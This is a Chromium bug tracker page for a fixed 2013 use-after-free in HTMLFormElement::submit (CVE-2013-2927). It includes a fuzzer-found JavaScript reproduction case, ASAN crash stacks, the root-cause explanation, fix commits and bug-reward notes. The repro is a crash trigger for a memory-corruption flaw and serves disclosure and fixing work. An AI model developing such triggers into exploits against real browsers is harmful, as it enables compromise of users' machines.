New issue
Advanced search Search tips

Issue 297478 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Sep 2013
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: 1
Type: Bug-Security



Sign in to add a comment

Heap-use-after-free in WebCore::HTMLFormElement::submit

Reported by cloudfuz...@gmail.com, Sep 24 2013

Issue description

VULNERABILITY DETAILS
The following testcase crashes the latest ASAN build of chrome.

Requires --expose-gc

VERSION
Chrome Version: asan-symbolized-linux-release-224738
Operating System: Linux 64bit

REPRODUCTION CASE
<script>
function start() {
o179=document.createElement('form');
o180=document.createElement('input');
o180.type='submit';
o179.addEventListener('submit', cb_trigger_onsubmit_25_1,false);
o179.action='javascript:gc()';
o179.appendChild(o180);
o180.click();
}
function cb_trigger_onsubmit_25_1() {
o179.removeChild(o180);
o179=null;
}
window.setTimeout("start()", 100);
</script>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State: See attached stack.txt for ASAN output
 
stack.txt
18.9 KB View Download
Project Member

Comment 1 by ClusterFuzz, Sep 24 2013

ClusterFuzz is now working on this testcase. See https://cluster-fuzz.appspot.com/testcase?key=5045782138847232
Project Member

Comment 2 by ClusterFuzz, Sep 24 2013

Summary: Heap-use-after-free in WebCore::HTMLFormElement::submit (was: Security: ASAN "heap-use-after-free" in WebCore::HTMLFormElement::submit)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5045782138847232

Uploader: ianbeer@google.com
Job Type: Linux_asan_chrome_mp

Crash Type: Heap-use-after-free WRITE 1
Crash Address: 0x61300002bd42
Crash State:
  - crash stack -
  WebCore::HTMLFormElement::submit
  WebCore::HTMLFormElement::prepareForSubmission
  - free stack -
  WebCore::FormSubmission::~FormSubmission
  WebCore::HTMLFormElement::submit
  

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv96ZmNd-a02H1IgRrG9sIWBrhrJ-NNSFR3Q6YENBKS5PkiLvSKScQlng9u1a_DT_HLLaeiIhcPP48C8GfvHdAS4gX-Q_vvo12WgLV-VLpyt7FoM6TpUMXFmv3TWZYWcJjZldpCN5so6lgOqwECVhRzvOHQ3iiQ


Labels: Cr-Blink-Forms Security_Severity-High Security_Impact-Stable Security_Impact-Beta
Status: Available
Project Member

Comment 4 by ClusterFuzz, Sep 24 2013

Labels: reward-topanel
ClusterFuzz thinks that this bug might be eligible for a reward! Forwarding to reward panel for consideration.
Project Member

Comment 5 by ClusterFuzz, Sep 24 2013

Labels: M-29 Stability-Memory-AddressSanitizer
Adding milestone and impact labels.

Comment 6 by jww@chromium.org, Sep 25 2013

Owner: tkent@chromium.org
Status: Assigned
Kent, this looks like it touches a bunch of HTMLInputElement stuff. Can you take a look? Thanks!

FYI, you're definitely going to need --js-flags="--expose-gc" and ASAN for the repro.
Cc: ifratric@google.com
Did you saw our new criteria for possibly issuing higher rewards? See http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program/reward-nomination-process
E.g. If you are able to provide a repro that faulted at an address of 0x41414141, it will qualify for the new higher rewards. Or, if you can show that you have control between free and crash points, etc.

Comment 9 by tkent@chromium.org, Sep 27 2013

Status: Started

Comment 10 by tkent@chromium.org, Sep 27 2013

> o179.addEventListener('submit', cb_trigger_onsubmit_25_1,false);
> function cb_trigger_onsubmit_25_1() {
>     o179.removeChild(o180);
>     o179=null;
> }

Only removing a FORM element from the document tree in a submit event handler doesn't make a problem because an Event object still has a reference to the FORM element, and the event object lives until next GC.

> o179.action='javascript:gc()';

Unfortunately we have another chance to execute JavaScript. This gc() deletes the event object, and referred FORM element.

Project Member

Comment 11 by bugdroid1@chromium.org, Sep 27 2013

The following revision refers to this bug:
    http://src.chromium.org/viewvc/blink?view=rev&rev=158428

------------------------------------------------------------------------
r158428 | tkent@chromium.org | 2013-09-27T08:13:50.253600Z

Changed paths:
   M http://src.chromium.org/viewvc/blink/trunk/Source/core/html/HTMLFormElement.cpp?r1=158428&r2=158427&pathrev=158428
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/fast/forms/form-submission-crash.html?r1=158428&r2=158427&pathrev=158428
   A http://src.chromium.org/viewvc/blink/trunk/LayoutTests/fast/forms/form-submission-crash-expected.txt?r1=158428&r2=158427&pathrev=158428

Fix a crash in HTMLFormElement::prepareForSubmission.

BUG= 297478 
TEST=automated with ASAN.

Review URL: https://chromiumcodereview.appspot.com/24910003
------------------------------------------------------------------------

Comment 12 by aarya@google.com, Sep 27 2013

Status: Fixed
Project Member

Comment 13 by ClusterFuzz, Sep 27 2013

Labels: Merge-Approved
Adding Merge-Approved to track merges across stable and beta branches. Please do not merge without checking with the release manager first. If the fix is not applicable for merge, change this label to Merge-NA.
Project Member

Comment 14 by ClusterFuzz, Sep 27 2013

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Project Member

Comment 15 by ClusterFuzz, Sep 30 2013

ClusterFuzz has detected this issue as fixed in range 225895:225905.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=5045782138847232

Uploader: ianbeer@google.com
Job Type: Linux_asan_chrome_mp

Crash Type: Heap-use-after-free WRITE 1
Crash Address: 0x61300002bd42
Crash State:
  - crash stack -
  WebCore::HTMLFormElement::submit
  WebCore::HTMLFormElement::prepareForSubmission
  - free stack -
  WebCore::FormSubmission::~FormSubmission
  WebCore::HTMLFormElement::submit
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=225895:225905

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv96ZmNd-a02H1IgRrG9sIWBrhrJ-NNSFR3Q6YENBKS5PkiLvSKScQlng9u1a_DT_HLLaeiIhcPP48C8GfvHdAS4gX-Q_vvo12WgLV-VLpyt7FoM6TpUMXFmv3TWZYWcJjZldpCN5so6lgOqwECVhRzvOHQ3iiQ

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.

Comment 16 by aarya@google.com, Oct 1 2013

Labels: -Merge-Approved Merge-Requested
Project Member

Comment 17 by ClusterFuzz, Oct 2 2013

Labels: -M-29 M-30
Migrating old milestone labels.

Comment 18 by kareng@google.com, Oct 4 2013

Labels: -Merge-Requested Merge-Approved Release-1-M30
pls merge to M30 - branch 1599 and then switch mstone to 31 and re-request merge. ty.
Labels: -Merge-Approved -M-30 Merge-Merged-1599 M-31 Merge-Requested
Labels: -Merge-Requested Merge-Approved
Project Member

Comment 22 by bugdroid1@chromium.org, Oct 8 2013

The following revision refers to this bug:
    http://src.chromium.org/viewvc/blink?view=rev&rev=158998

------------------------------------------------------------------------
r158998 | tkent@chromium.org | 2013-10-07T00:23:53.878814Z

Changed paths:
   M http://src.chromium.org/viewvc/blink/branches/chromium/1599/Source/core/html/HTMLFormElement.cpp?r1=158998&r2=158997&pathrev=158998
   A http://src.chromium.org/viewvc/blink/branches/chromium/1599/LayoutTests/fast/forms/form-submission-crash.html?r1=158998&r2=158997&pathrev=158998
   A http://src.chromium.org/viewvc/blink/branches/chromium/1599/LayoutTests/fast/forms/form-submission-crash-expected.txt?r1=158998&r2=158997&pathrev=158998

Merge 158428 "Fix a crash in HTMLFormElement::prepareForSubmission."

> Fix a crash in HTMLFormElement::prepareForSubmission.
> 
> BUG= 297478 
> TEST=automated with ASAN.
> 
> Review URL: https://chromiumcodereview.appspot.com/24910003

TBR=tkent@chromium.org

Review URL: https://codereview.chromium.org/26200002
------------------------------------------------------------------------
Project Member

Comment 23 by bugdroid1@chromium.org, Oct 8 2013

The following revision refers to this bug:
    http://src.chromium.org/viewvc/blink?view=rev&rev=159067

------------------------------------------------------------------------
r159067 | tkent@chromium.org | 2013-10-08T00:23:20.774285Z

Changed paths:
   A http://src.chromium.org/viewvc/blink/branches/chromium/1650/LayoutTests/fast/forms/form-submission-crash-expected.txt?r1=159067&r2=159066&pathrev=159067
   M http://src.chromium.org/viewvc/blink/branches/chromium/1650/Source/core/html/HTMLFormElement.cpp?r1=159067&r2=159066&pathrev=159067
   A http://src.chromium.org/viewvc/blink/branches/chromium/1650/LayoutTests/fast/forms/form-submission-crash.html?r1=159067&r2=159066&pathrev=159067

Merge 158428 "Fix a crash in HTMLFormElement::prepareForSubmission."

> Fix a crash in HTMLFormElement::prepareForSubmission.
> 
> BUG= 297478 
> TEST=automated with ASAN.
> 
> Review URL: https://chromiumcodereview.appspot.com/24910003

TBR=tkent@chromium.org

Review URL: https://codereview.chromium.org/26317004
------------------------------------------------------------------------
Labels: CVE-2013-2927
Labels: -reward-topanel reward-unpaid reward-2000
$2000 since there is control between the free and use, but it is inside the node heap partition.
Labels: -reward-unpaid reward-inprocess
OK, kicked off payment for this one (and the rest). Expect something in a few weeks. Thanks again cloudfuzzer :)
Project Member

Comment 27 by ClusterFuzz, Nov 13 2013

Labels: Hotlist-Webkit
Cc: ddkil...@apple.com
Project Member

Comment 29 by ClusterFuzz, Feb 6 2014

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Labels: -reward-inprocess
Project Member

Comment 31 by ClusterFuzz, Feb 2 2016

Labels: -Security_Impact-Beta
Project Member

Comment 32 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 33 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted
Project Member

Comment 36 by sheriffbot@chromium.org, Jul 29

Labels: Pri-1

Sign in to add a comment